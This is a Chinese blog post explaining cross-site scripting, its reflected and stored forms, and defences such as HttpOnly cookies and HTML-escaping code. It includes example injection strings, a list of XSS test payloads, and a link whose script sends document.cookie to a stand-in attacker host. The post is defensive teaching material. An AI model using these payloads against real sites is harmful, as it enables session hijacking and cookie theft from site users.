简单总结一下 XSS

最新推荐文章于 2020-12-30 09:54:00 发布
最新推荐文章于 2020-12-30 09:54:00 发布
阅读量161 收藏
点赞数
原文链接:http://www.cnblogs.com/FlightButterfly/p/7118324.html
版权

你听说过XSS吗?
XSS(Cross-site scripting, 跨站脚本)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。
研究表明,最近几年 XSS 已经超过 “缓冲区溢出” 成为最流行的攻击方式,有68%的网站可能遭受此类攻击。

那么检测一下你是否充分了解 XSS 吧

  1. XSS 为什么会发生?
  2. XSS 有几种类型?
  3. XSS 如何预防和修复?

如果可以回答?3个问题,这篇文章对你提升是微乎其微的。
如果不可以,你可以花十分钟左右阅读一下。

我目前的客户是一家银行,因为企业特性和业务需求,对系统安全高度重视。
因此,我不得不分析了整个系统,从中找出未对应 XSS 的 Code 。说实话,虽然是企业内部系统,但是代码也不少,看代码看的我都快吐了。

得益于此,让我对XSS的理解更加深了一层。

1. XSS 为什么会发生?

因为用户输入的数据被当成代码执行了。

那么,为什么用户输入的数据会被当成代码并且被执行呢?
因为当用户输入尖括号< >,引号' ",斜杠/之类的特殊字符时,可能破坏原始的代码结构,导致输入的部分内容被当成代码,并且被执行。

[小例子]
假如有下面一个textbox

<input type="text" name="message" value="hello tj">

hello tj是来自用户的输入,如果用户不是输入hello tj,而是输入"/><script>alert(document.cookie)</script><p name=" 那么就会变成?的样子。可不可怕?

<input type="text" name="address1" value=""/><script>alert(document.cookie)</script><p name="">

2. XSS 有几种类型?

XSS 有两种类型,反射型XSS持久型XSS

反射型XSS

也就是非持久型XSS,常见诱骗用户点击带有攻击代码的URL链接,链接被浏览器执行,从而攻击用户。
只有当前用户被影响,影响范围:小。

[小例子]

<a href="http://xxx91.com/index?term=<script>window.open('http://hacker.com?yourcookie='+document.cookie)</script>">小姐姐</a>

如果你点击了?链接,你cookie信息就有可能被发送到黑客的服务器http://hacker.com
虽然链接可能被用户怀疑,但是可以通过短网址服务将之缩短,从而隐藏攻击代码。

持久型XSS

也叫存储型XSS,提交包含攻击代码的数据到服务器。
所有浏览这部分数据的用户都将被攻击代码影响,影响范围:大

[小例子]
html模版如下:

<input type="text" name="message" value="${message}">

当从数据库查询的 message 如下:
"/><script>alert(document.cookie)</script><p name="
生成的 html 将变成?:

<input type="text" name="address1" value=""/><script>alert(document.cookie)</script><p name="">

此时,html可能已经不受我们控制了。

3. XSS 如何预防和修复?

原则:所有用户输入都是不可信的。(注意:攻击代码不一定仅在<script></script>中。)

  • 预防 反射型XSS
    将重要的cookie标记为http only,这样的话Javascript 中的document.cookie语句就不能获取到cookie了。

  • 预防 持久型XSS
    处理掉可能破坏原始代码结构的特殊字符。将特殊字符编码成转义字符,使其成为数据的一部分而不是代码。
    [需要编码的7个字符]
&     –>     &amp;
<     –>     &lt;
>     –>     &gt;
"     –>     &quot;
`     ->     &#x60;
'     –>     &#x27;
/     –>     &#x2f;

有两点需要特别说明的是:

  1. 不推荐将单引号'编码为 &apos; ,因为它并不是标准的HTML标签
  2. 需要对斜杠号/编码,因为在进行XSS攻击时,斜杠号对于关闭当前HTML标签非常有用

(最后)

  1. 分享一段简单的代码
function escapeHtml(value) {
  if (typeof value !== 'string') {
    return value
  }
  return value.replace(/[&<>`"'\/]/g, function(result) {
    return {
      '&': '&amp;',
      '<': '&lt;',
      '>': '&gt;',
      '`': '&#x60;',
      '"': '&quot;',
      "'": '&#x27;',
      '/': '&#x2f;',
    }[result]
  })
}
  1. 分享一些用于检测 XSS 的测试用例
><script>alert(document.cookie)</script>
='><script>alert(document.cookie)</script>
"><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert (vulnerable)</script>
%3Cscript%3Ealert('XSS')%3C/script%3E
<script>alert('XSS')</script>
<img src="javascript:alert('XSS')">
<img src="http://xxx.com/yyy.png" onerror="alert('XSS')">

希望这篇文章对你有帮助。by iamtjcn
首发:blog.iamtjcn.com

转载于:https://www.cnblogs.com/FlightButterfly/p/7118324.html

dengke6556
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试学习笔记(一)
weixin_39405856的博客
09-23 1000
1、如何防止XSS跨站脚本攻击? ①将重要的cookie标记为http only,这样的话Javascript 中的document.cookie语句就不能获取到cookie了 ②只允许用户输入我们期望的数据。例如:年龄的textbox中,只允许用户输入数字,而数字之外的字符都过滤掉 ③对数据进行Html Encode 处理。< 转化为 &lt;、> 转化为 &gt;、& 转化为 &amp;、' 转化为 &#039;、" 转化为 &quot;、空格
web安全问题简记
小冷_Blog
04-19 258
最初,让我写这个,我是拒绝的,后来,面试被问到,炸了,虽曾看过,却不曾记之,俗语有言:好记性不如烂笔头,这波,GG。 虽然,我写了这篇博客,但是,你要想多了解点内容,还是去看别人的稳,文章里放的链接都是我整个看完觉得不错的,大家有兴趣直接移步,妥! web常见的安全问题: 1. XSS (cross site scripting 跨站脚本攻击) XSS用最简单的话介绍就是通过在输入...
Java 面试知识点解析(五)——网络协议篇
anye0005的博客
05-18 911
前言: 在遨游了一番 Java Web 的世界之后,发现了自己的一些缺失,所以就着一篇深度好文:知名互联网公司校招 Java 开发岗面试知识点解析 ,来好好的对 Java 知识点进行复习和学习一番,大部分内容参照自这一篇文章,有一些自己补充的,也算是重新学习一下 Java 吧。 前序文章链接: Java 面试知识点解析(一)——基础知识篇 Java 面试知识点解析(二)——高并...
【应用安全——XSS】修复建议
Fly_鹏程万里
02-22 4751
本身XSS输出位置不同,且可构造的Payload很多,一般是从一下三个角度来修复。 httponly 一般谈到cookie时,所对应的安全配置有httponly和secure。 Httponly:为了防止设置了该标志的cookie被JavaScript读取。 Secure:只能通过HTTPS使用,确保在从客户机传输到服务器时,cookie总是被加密的。 Jboss中可以在content....
如何利用response.addHeader()方法设置cookie
shandalue的专栏
07-02 2万+
将cookie设置成HttpOnly是为了防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。 如何在Java中设置cookie是HttpOnly呢? Servlet 2.5 API 不支持 cookie设置HttpOnly http://docs.oracle.com/cd/E17802_01/products/prod
防止XSS攻击解决办法
01-20
XSS(Cross-site scripting)攻击是一种常见的网络安全威胁,它利用了网站对用户输入的不当处理,...通过Web.xml配置过滤器是其中一种简单实用的方法,但全面的安全措施应包括多个方面,以确保用户的浏览体验不受威胁。
使用Django简单编写一个XSS平台的方法步骤
01-20
总结,构建一个Django驱动的XSS平台涉及理解XSS攻击机制、掌握Django框架的使用以及数据库操作。通过这样的平台,你可以模拟攻击场景,提高对XSS防御的理解,并学习如何保护Web应用免受此类攻击。
第四节 隐藏提交参数中的XSS-01
最新发布
09-15
例如:(document.domain)>%0a,这是一个简单XSS攻击示例。闭合触发XSS可以使攻击者在用户的浏览器中执行恶意脚本,导致安全问题。 总结 ---- 本节课程主要讲解了隐藏提交参数中的XSS攻击,包括HTML表单隐藏参数...
安全漏洞XSS攻击方法详解
01-26
总结来说,XSS攻击是一种严重的安全威胁,它利用Web应用程序的漏洞,通过注入恶意脚本,影响用户浏览器的行为。理解XSS的工作原理、潜在危害以及防范措施对于维护网络安全至关重要。开发者需要实施严格的输入验证和...
18.XSS跨站脚本攻击原理及代码攻防演示(一)1
08-03
</script>`,如果这个输入被原样显示在结果页上,那么所有访问这个页面的用户都会看到一个弹出的警告框,这就是一个简单XSS攻击实例。 3. XSS危害: XSS攻击可能导致以下后果: - 数据泄露:攻击者可以窃取用户...
使用HttpOnly提升Cookie安全性
zzzmmmkkk的专栏
09-01 9万+
在介绍HttpOnly之前,我想跟大家聊聊Cookie及XSS。 随着B/S的普及,我们平时上网都是依赖于http协议完成,而Http是无状态的,即同一个会话的连续两个请求互相不了解,他们由最新实例化的环境进行解析,除了应用本身可能已经存储在全局对象中的所有信息外,该环境不保存与会话有关的任何信息,http是不会为了下一次连接而维护这次连接所传输的信息的。所以为了在每次会话之间传递信息,
cookie设置HttpOnly
零度的博客专栏
05-20 2万+
1.什么是HttpOnly?         如果cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,窃取cookie内容,这样就增加了cookie的安全性,即便是这样,也不要将重要信息存入cookie。XSS全称Cross SiteScript,跨站脚本攻击,是Web程序中常见的漏洞,XSS属于被动式且用于客户端的攻击方式,所
js无法读取httponly属性的cookie
wangshang1320的博客
07-14 3077
httponly属性的cookie只能在服务器进行操作, 前端js是没法获取和修改的
XSS跨站脚本攻击
weixin_30505225的博客
04-26 1036
1、简介 跨站脚本(cross site script)为了避免与样式css混淆,所以简称为XSSXSS是一种经常出现在web应用中的计算机安全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网站没有对用户提交数据进行转义处理或者过滤不足的缺点,进而添加一些代码,嵌入到web页面中去。使别的用户访问都会执行相应的嵌入代码。 从而盗取用户资料、利用用户身...
面试/笔试第一弹 —— 计算机网络面试问题集锦
热门推荐
Rico's Blogs
10-21 12万+
本文对面试/笔试过程中经常会被问到的一些关于计算机网络的问题进行了梳理和总结,一方面方便自己温故知新,另一方面也希望为找工作的同学们提供一个复习参考。关于这块内容的初步了解和掌握,建议大家读一读《图解HTTP》一书。
web安全之XSS浅析
LQ55
10-11 665
Web安全定义 随着web2.0、社交网络、微博等等一系列新型的互联网产品的诞生,基于Web环境的互联网应用越来越广泛,企业信息化的过程中各种应用都架设在Web平台上,Web业务的迅速发展也引起黑客们的强烈关注,接踵而至的就是Web安全威胁的凸显,黑客利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取内部数据,更为严重的则是在网
计算机网络面试
weixin_42272869的博客
12-30 7680
一. 网络基础知识讲解 1.1 网络协议 当前世面上主要存在的几种协议: 四层, 五层 , 七层 OSI开放式协议是主流协议[七层] 1.2 七层协议: 第一层 物理层: 机械、电子、定时接口通信道上的原始比特流传输 功能:以二进制数据形式在物理媒体上传输数据 第二层 数据链路层: 物理寻址,同时将原始比特流变为逻辑传输线路 功能: 传输有地址的帧以及错误检测功能 第三层 网络层: 控制子网的运行,如逻辑编址,分组传输、路由选择; 功能:为数据包选择路由 第四层 传输层: 接收上一
《JavaScript 高级程序设计(第3版)》 源码分析
愿你走过半生,归来任是少年。
03-04 5600
《JavaScript 高级程序设计(第3版)》 源码分析 《JavaScript高级程序设计》是2006年人民邮电出版社出版的图书,作者是(美)(Nicholas C.Zakas)扎卡斯。本书适合有一定编程经验的开发人员阅读,也可作为高校相关专业课程的教材。 献给搬砖人士,求职人士很不错的基础扎实笔记 经验 js 放置在 页面的合理位置 对于优化加载有很大的帮助 切记平稳退化,如果不支持的情况下 有很多种方案 ,书中提到了...
BUU XSS COURSE 1
09-12
BUU XSS COURSE 1是一个关于跨站脚本攻击(XSS)的课程。在这个课程中,学习者将学习如何识别和利用网站中的XSS漏洞。引用中提到了一个payload,它包含了一个iframe标签和一段srcdoc代码,这个payload可以用于触发XSS漏洞。引用提供了一个简单XSS代码示例,它使用了<script>标签来弹出一个警报框。引用中提到了一个XSS平台,通过利用管理员的cookie和来访地址,可以访问指定的URL地址。 总结起来,BUU XSS COURSE 1是一个教授XSS攻击技术的课程,通过学习课程内容,学习者可以了解如何识别和利用网站中的XSS漏洞,并且还提供了一些XSS代码示例和相关工具来帮助学习者进行实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值